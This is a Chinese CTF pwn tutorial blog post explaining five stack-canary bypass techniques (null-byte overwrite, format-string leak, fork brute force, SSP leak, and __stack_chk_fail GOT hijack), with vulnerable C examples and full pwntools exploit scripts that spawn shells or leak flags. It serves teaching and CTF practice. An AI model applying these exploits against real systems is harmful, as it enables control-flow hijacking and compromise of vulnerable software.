Pwn之Canary绕过的五种方法

最新推荐文章于 2025-03-13 23:10:02 发布
最新推荐文章于 2025-03-13 23:10:02 发布
阅读量2.8k 收藏 41
点赞数 77
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Rinko233/article/details/143635468
版权

0x00 Canary介绍及原理

Canary 的意思是金丝雀🦜,英国矿井工人们每次下井都会带上一只金丝雀,如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。

我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈溢出保护后,函数开始执行的时候会先往栈底插入一段cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。攻击者在覆盖返回地址的时候往往也会将 cookie 信息给覆盖掉,导致栈保护检查失败而阻止 shellcode 的执行,避免漏洞利用成功。在 Linux 中我们将 cookie 信息称为 Canary。由于栈溢出而引发的攻击非常普遍也非常古老,相应地 Canary 技术很早就出现在 glibc 里,直到现在也作为系统安全的第一道防线存在。

可以在 GCC 中使用以下参数设置 Canary:

-fstack-protector 启用保护,不过只为局部变量中含有数组的函数插入保护
-fstack-protector-all 启用保护,为所有函数插入保护
-fstack-protector-strong
-fstack-protector-explicit 只对有明确 stack_protect attribute 的函数开启保护
-fno-stack-protector 禁用保护

开启Canary保护的stack结构如下:
 

High     Address......
args
Return   Address
rbp=============>old    ebp
rbp-8(32位中为4)===>canary     value
局部变量
Low     Address..........

当程序启用 Canary 编译后,在函数序言部分会取 fs (gs)  寄存器 0x28 (0x14) 处的值,存放在栈中 rax (eax) 的位置,这个操作即为向栈中插入 Canary 值(括号中为32位时情况):

mov    rax, qword ptr fs:[0x28]
mov    qword ptr [rbp - 8], rax

在函数返回之前,会将该值取出,并与 fs:0x28 的值进行异或。如果异或的结果为 0,说明 Canary 未被修改,函数会正常返回,这个操作即为检测是否发生栈溢出。

mov    rdx,QWORD PTR [rbp-0x8]
xor    rdx,QWORD PTR fs:0x28
je     0x4005d7 <main+65>
call   0x400460 <__stack_chk_fail@plt>

如果 Canary 已经被非法修改,此时程序流程会走到 __stack_chk_fail,该函数如下:

eglibc-2.19/debug/stack_chk_fail.c

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

0x01 覆盖截断字符获取Canary

适用于有栈溢出的题目

32位程序中,Canary为4个字节,其中最低字节为\x00,可以防止被read和write等函数读出来。通过栈溢出将低位的\x00覆写,从而读出canary的值。

因此我们需要构建两次栈溢出,第一次将Canary低字节的\x00覆写,然后读出Canary后面的值,第二次溢出在给出输出的Canary前面加上\x00即可,然后覆盖Canary到ebp距离和ebp本身的长度,即可到达返回地址。

32位的例题:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
void getshell(void) {
    system("/bin/sh");
}
void init() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}
void vuln() {
    char buf[100];
    for(int i=0;i<2;i++){
        read(0, buf, 0x200);
        printf(buf);
    }
}
int main(void) {
    init();
    puts("Hello Hacker!");
    vuln();
    return 0;
}

编译:

gcc pwn.c -no-pie -m32 -fstack-protector -z noexecstack -o pwn

检查后发现开启了NX,canary和部分relro,并且程序中有getshell()可以直接返回shell,vuln()函数中存在栈溢出。寻找canary :

因此可以得出,canary被存放在了ebp+var_C的位置,即0xC的位置

read进行输入时栈顶的位置为:

从栈顶到canary低字节的距离就是 0x70-0xC,而第一次需要覆盖掉低字节的\x00,所以还需要+1

下面是exp:

from pwn import *
conn = process('./pwn')

getshell = 0x080491c6
payload_1 = b'a' * (0x70 - 0xc)  #第一次溢出
conn.send(payload_1)
recvbytes = conn.recv()  # 获取canary
canary = u32(recvbytes[0x65:0x68].rjust(4, b'\x00')) #拼接canary
payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a' * 0xc + p32(getshell)
#第二次溢出
conn.send(payload_2)
conn.recv()
conn.interactive()

0x02 利用格式化字符漏洞获取Canary

格式化字符串漏洞可以打印出栈中的内容,因此可以打印出canary的值,从而进行栈溢出。

还是以上一道题为例,程序使用了 printf(buf) 这种危险方法直接打印了 read 输入的内容,因此可以通过输入格式化字符串来泄露栈上的内容。

首先,我们先确定当前文本在栈中的位置,输入以下内容

AAAA%p%p%p%p%p%p%p%p

看到0x41414141出现在栈中的第六个位置,而栈顶到canary的距离是0x70-0xc,一个不带长度的格式化字符会输出4个字节大小的数据,因此从第六个数据开始,再输出25个数据介绍canary的值,而6+25=31,我们可以用如下payload输出canary:

payload_1 = %31$x

canary就是收到的内容

具体原理可以看我的这篇文章:Pwn之格式化字符串漏洞-CSDN博客

最后和上题一样,再溢出一次获取shell,exp如下:

from pwn import *
conn = process('./pwn')
getshell = 0x80491c6 # 第一次溢出
payload_1 = b'%31$x'
conn.send(payload_1)
canary = conn.recvuntil(b'00')
canary = int(canary[-8:],16) # 获取canary并转换成16进制整型
print(f'Canary: {hex(canary)}')
payload_2 = b'a' * (0x70 - 0xc) + p32(canary) + b'a' * 0xc + p32(getshell) 
# 第二次溢出
conn.send(payload_2)
conn.recv()
conn.interactive()

0x03 逐字节爆破绕过Canary

适用于有通过fork()函数创建的子进程的程序

某些题目中存在fork()函数,且程序开启了canary保护,当程序进入到子进程的时候,其canary的值和父进程中canary的值一样,因为fork函数为拷贝父进程的内存,因此在一定的条件下我们可以将canary爆破出来;需要必备的条件就是程序中存在栈溢出的漏洞,并且可以覆盖到canary的位置,那么我们就可以把canary一位一位的爆破出来。

对于32位ELF,只需要对三个字节进行爆破。爆破方式是先利用栈溢出覆写次低字节,如果出错的话,会报错并且重启子进程,获得正确的次低字节的话,不会报错。获取正确的次低字节之后,再依次爆破次高字节和高字节。每个字节的可能性是256,因此3个字节的逐个爆破总次数是256+256+256=768次

例题:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>  
#include <sys/wait.h>

void getshell(void)
{
    system("/bin/sh");
}

void init(void)
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
}

void vuln(void)
{
    char buf[100];
    memset(buf, 0, sizeof(buf));
    read(0, buf, 0x200);
    printf("%s\n", buf);
}
int main(void)
{
    init();
    while (1)
    {
        printf("Hello Hacker!\n");
        if (fork()) //father
        {
            wait(NULL);
        }
        else //child
        {
            vuln();
            exit(0);
        }
    }

    return 0;
}

编译同上 ,漏洞和后门函数同上,编写爆破脚本获得canary:

from pwn import *
import time

conn = process('./pwn')
getshell = 0x080491f6

canary = b'\x00'
for i in range(3):
  for j in range(0, 256):
    payload = b'a' * (0x70 - 0xC) + canary + p8(j)
    conn.send(payload)
    time.sleep(0.1)
    res = conn.recv()
    if ( b"stack smashing detected" not in res):
        print(f'the {i} is {hex(j)}')
        canary += p8(j)
        break
  assert(len(canary) == i+2)     
print(f'Canary : {hex(u32(canary))}')
payload_2 = b'a' * (0x70 - 0xc) + canary + b'a' * 0xc + p32(getshell)
# 第二次溢出
conn.send(payload_2)
conn.recv()
conn.interactive()

0x04 SSP泄露Canary

适用于Flag存储于内存空间中的情况

#来源于Canary保护详解和常用Bypass手段-安全客 - 安全资讯平台实在是看不懂,感觉也不常用#

SSP全称是Stack Smashing Protect,这种方法虽然不能让我们getshell,但是可以读取内存中的值,当flag在内存中储存时,我们就可以利用这个方法来读取flag。

文章开头分析了__stack_check_fail(),当程序中存在栈溢出,并且溢出的长度可以覆盖掉程序中argv[0]的时候,我们可以通过这种方法打印任意地址上的值,造成任意地址读。

对于linux,fs段寄存器实际指向的是当前栈的TLS结构,fs:0x28(gs:0x14)指向的正是stack_guard

typedef struct
{
  void *tcb;        /* Pointer to the TCB.  Not necessarily the
                       thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;       /* Pointer to the thread descriptor.  */
  int multiple_threads;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  ...
} tcbhead_t;

如果存在溢出并且可以覆盖位于TLS中保存的canary值,那么就可以实现绕过保护机制

TLS中的值由函数security_init进行初始化

static void
security_init (void)
{
  // _dl_random的值在进入这个函数的时候就已经由kernel写入.
  // glibc直接使用了_dl_random的值并没有给赋值
  // 如果不采用这种模式, glibc也可以自己产生随机数

  //将_dl_random的最后一个字节设置为0x0
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);

  // 设置Canary的值到TLS中
  THREAD_SET_STACK_GUARD (stack_chk_guard);

  _dl_random = NULL;
}

//THREAD_SET_STACK_GUARD宏用于设置TLS
#define THREAD_SET_STACK_GUARD(value) 
  THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)

用网鼎杯的GUESS题为例,该题启用了NX和canary

程序先把flag读入到栈上,然后利用gets函数进行三次读入,这里可以进行三次栈溢出,然后利用SSP Leak将flag打印出来,首先找到argv[0]的地址,计算出偏移量,用gdb加载程序,在栈很高的地址上可以看到,它默认指向文件名。

在gdb中调试出,我们输入的字符串s2在 “rbp-0x40”处,flag在”rbp-0x70处”,从而计算出能够覆盖掉argv[0]的偏移是0x128

根据第一次泄露出的puts函数的真实地址,计算出libc基地址

payload = 'a'* 0x128 + p64(0x602020)*3

第二次泄露的_environ,也就是真实栈的地址

environ_addr = libc_base + libc.symbols['_environ']

在linux应用程序运行时,内存的最高端是环境/参数节(environment/arguments section),用来存储系统环境变量的一份复制文件,进程在运行时可能需要。

例如,运行中的进程,可以通过环境变量来访问路径、shell 名称、主机名等信息。
该节是可写的,因此在格式串(format string)和缓冲区溢出(buffer overflow)攻击中都可以攻击该节。

*environ指针指向栈地址(环境变量位置),有时它也成为攻击的对象,泄露栈地址,篡改栈空间地址,进而劫持控制流。环境表是一个表示环境字符串的字符指针数组,由”name=value”这样类似的字符串组成,它储存在整个进程空间的的顶部,其中value是一个以”″结束的C语言类型的字符串,代表指针该环境变量的值,一般我们见到的name都是大写,但这只是一个惯例

我们需要泄漏出栈的地址,才能泄漏出flag,而_environ存着栈的地址,所以我们需要泄漏_environ

第三次通过之前计算的偏移,直接泄露flag,exp如下:

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']

p = process('./GUESS.')
puts_got = 0x602020
#leak libc
p.recvuntil('guessing flagn')
payload = 'a'*0x128 + p64(puts_got)
p.sendline(payload)
p.recvuntil('detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'x00'))
log.success('puts addr : 0x%x' %puts_addr)
#gdb.attach(p)
offset_puts = 0x6f690
libc_base = puts_addr - offset_puts
log.success('libc base addr : 0x%x' %libc_base)

addr__environ = 0x3c6f38
_environ_addr = libc_base + addr__environ
log.success('_environ addr : 0x%x' %addr__environ)

#leak environ
p.recvuntil('guessing flagn')
payload = 'a'*0x128 + p64(_environ_addr)
p.sendline(payload)
p.recvuntil('detected ***: ')
stack_base = u64(p.recv(6).ljust(8,'x00')) - 0x198
log.success('stack base addr : 0x%x' %stack_base)
flag_addr = stack_base + 0x30

#leak flag
p.recvuntil('guessing flagn')
payload = 'a'*0x128 + p64(flag_addr)
p.sendline(payload)
p.recvuntil('detected ***: ')
p.recvuntil('}')
p.interactive()

0x05 劫持__stack_chk_fail函数

在开启canary保护的程序中,如果canary不对,程序会转到stack_chk_fail函数执行。stack_chk_fail函数是一个普通的延迟绑定函数,可以通过修改GOT表劫持这个函数。

例题:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
void getshell(void)
{
    system("/bin/sh");
}
int main(int argc, char *argv[])
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    char buf[100];
    read(0, buf, 200);#栈溢出
    printf(buf);
    return 0;
}
  • 劫持函数需要修改got表,所以要关闭relro(RELocation Read Only)
  • 需要调用getshell函数,所以需要关闭pie(Position Indenpendent Executive)

 gcc pwn.c -m32 -fstack-protector -no-pie -z noexecstack -z norelro -o pwn

分析发现有getshell后门和格式化字符串漏洞,可以向任意地址写入数据。

根据之前GOT表的学习,我们知道GOT表中存储的是函数的实际地址,如果把__stack_chk_fail函数的got表地址替换为getshell的地址,在canary出错的情况下,调用__stack_chk_fail时就会直接获取到shell。

这里利用pwntools中的fmtstr_payload()可以方便的进行地址的篡改:

fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)

  • offset(int): 字符串的偏移
  • writes (dict): 注入的地址和值,{target_addr : change_to, }

先用上文方法确定字符串偏移,然后编写exp:

from pwn import *

conn = process('./pwn')
elf = conn.elf

stack_chk_fail_got = elf.got['__stack_chk_fail']
getshell = elf.sym['getshell'] 
payload = fmtstr_payload(10, {stack_chk_fail_got: getshell})
#修改GOT表地址
payload = payload.ljust(0x70, b'a') 
#触发__stack_chk_fail
conn.send(payload)
conn.interactive()

 

Rinko233
关注
绕过canary原理及其利用方式
glhdbk的博客
09-07 4462
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 3228
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
canary保护和pie保护的绕过
2301_79880074的博客
01-27 2627
今天通过三道例题学习一下开启canary,pie保护的解题方法
3.14学习——学会用pwntools进行调试以及学习canary保护
2401_88422349的博客
03-13 970
再根据伪C代码v6数组储存了canary,v4数组从[rbp-50h]开始,大小32字节,要填充的buf从[rbp-30h]开始,占用了40字节,而且占用[rbp-30h]到[rbp-8h],这非常关键,也就是说只要buf中填充超过40字节,多出来的部分就会覆盖canary导致程序崩溃。这是题目示例里的canary校验,当用户输入后会将输入后的canary与之前的canary副本进行异或,如果异或的值不是0,则执行___stack_chk_fail函数使程序崩溃。就说说我的逻辑和疑点,还请各位大佬指正。
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 8592
Canary各种绕过姿势
PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 1062
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
Canary绕过方法
zhuo1358的博客
03-31 1814
Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。\x00二话不说,上题基础检查发现canary丢入ida中发现在循环printf,并且存在字符串漏洞(这个稍后再谈)同时有getshell函数可以直接拿shell接下来就是找canary到栈顶的偏移有两种方法,这里先介绍第一种看汇编语言跟进这段函数的汇编发现 多了一段异或比较可以判断canary在var_c里,所以buf 到canary的偏移为0x70-0xc。
Canary,三种优雅姿势绕过
yjh_fnu_ltn的博客
07-06 1388
如果利用栈溢出将最低位的b’\x00’覆盖,就可以利用答应函数将canary一致输出,最后再在最低位拼接上。逐次覆盖掉canary的4个字节(一位无法绕过低位字节堆高位进行爆破,所以必须从低到高),且要求canary不能变化,绕过重开程序canary变化,就不适用爆破了。在进行栈溢出时,如果程序开启了canary保护,首先就需要泄漏这个随机值,否则其被覆盖掉后,程序在退出时再检查该值,会引发错误。注意:canary爆破时,利用栈溢出,溢出到canary位置,从。首先确定要覆盖的位置,由于是。
canary绕过感悟随记(pwn入门)
2402_83422357的博客
06-05 1287
这个是假设总共要打70个长度,canary在0xc的位置,你刚开始打程序打到canary的位置总共是打了0x70-0xc计算一下就是0x64的位置了,那么,32位的机子.canary的值为4个字节,所以我们接收0x65,0x66,0x67就可以接收到canary前面的3个字节了.[0x65:0x68]左闭右开可以达到要求,而canary规定最后一个字节为\x00,用rjust(4,b'\x00')可以达到要求.rjust(4,b'\x00')这个的意思就是说,总共接收4个字节的数据,先接收完所有数据。
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 4025
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
从o开始的pwn学习之随意pwnpwn(1)----两种绕过canary(金丝雀)的实例
jzc020121的博客
03-24 4295
从0开始的pwn学习之随意pwnpwn(1)----绕过canary(金丝雀)的实例 做两道道简单的pwn(因为刚刚学,可能难免会有错误,望师傅们轻点骂) 众所周知,绕过canary方法除了一个一个猜字节(不是),还有两种常见方法 (1)通过覆盖00字符读出canary (2)通过格式化字符串漏洞泄露canary 金丝雀基础知识 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死
BugkuCTF-PWNcanary超详细讲解
am_03的博客
08-31 2717
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
Canary机制的绕过
weixin_30822451的博客
04-22 353
目标程序下载 提取码:8ypi 1.检查程序开启了哪些安全保护机制 Canary与NX开启了 Canary机制简介 64位的canary机制,会在函数头部添加: mov rax,QWORD PTR fs:0x28 //从fs:0x28寄存器中取一个值 mov QWORD PTR [rbp-0x8],rax //写入当...
Canary以及Canary绕过技巧
Sakura给爷pwn全场
12-11 401
canary介绍与绕过技巧: https://blog.csdn.net/weixin_43713800/article/details/105273284
【八芒星计划】绕过canary
carol2358的博客
09-02 752
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
PWN入门(10)绕过程序堆栈Canary防护
Ba1_Ma0的博客
10-05 1221
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入10文件夹。
2021-06-15 pwncanary绕过简单思路梳理
yulate的个人博客
07-13 929
文章目录一、原题链接二、简单解题思路0x01、查看程序保护0x02、main的栈0x03、构造payload0x04、最终exp 一、原题链接 bugku-pwn4 二、简单解题思路 0x01、查看程序保护 开启了canary保护和NX保护 0x02、main的栈 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+10h] [rbp-240h] BYREF char v5
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 1167
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
PWN——canary问题
ysy___ysy的博客
09-16 1361
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。
canary绕过脚本分析
最新发布
03-16
### Canary机制概述 栈金丝雀(Stack Canary)是一种用于检测缓冲区溢出的安全技术。其基本原理是在函数返回地址之前放置一个特定值(称为“金丝雀”),如果该值被修改,则表明发生了缓冲区溢出攻击[^1]。 在网络安全上下文中,绕过Canary保护通常涉及利用某些漏洞来规避这种安全措施。以下是几种常见的方法: 1. **覆盖其他变量而非直接破坏Canary** 攻击者可能通过精心设计输入数据仅覆盖目标内存区域中的非关键部分而不触及实际的Canary值,从而避免触发异常处理程序[^2]。 2. **泄露Canary值后再实施攻击** 如果存在信息泄漏漏洞,比如格式化字符串错误等,可以先读取到当前线程或进程内的Canary具体数值;之后再基于此构建精确控制流劫持所需的payload[^3]。 3. **利用已知固定Canary模式** 某些老旧系统可能存在未随机化的Canary实现方式,在这些情况下可以直接猜测或者枚举出正确的Canary序列号来进行后续操作[^4]。 下面给出一段Python伪代码展示如何尝试获取并应用泄露出来的canary value: ```python import struct def leak_canary(target_process): # 假设这里有一个能够造成信息泄露的功能调用 leaked_data = target_process.send_payload("%x." * 20) # 解析返回的数据找出canary所在位置 canary_value = int(leaked_data.split('.')[CANARY_POSITION], 16) return canary_value def craft_exploit(canary, buffer_size): nop_sled = b"\x90" * (buffer_size - len(shellcode)) shellcode = asm("mov $0xb,%al; mov %esp,%ebx; ...") # 构造shellcode address_to_jump = struct.pack("<I", RETURN_ADDRESS) exploit_payload = ( nop_sled + shellcode + struct.pack("<I", canary) + b"A"*(CANARY_PADDING_SIZE-len(struct.pack("<I", canary))) + address_to_jump ) return exploit_payload ``` 以上仅为理论上的演示,请勿非法测试任何真实环境下的软件和服务!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值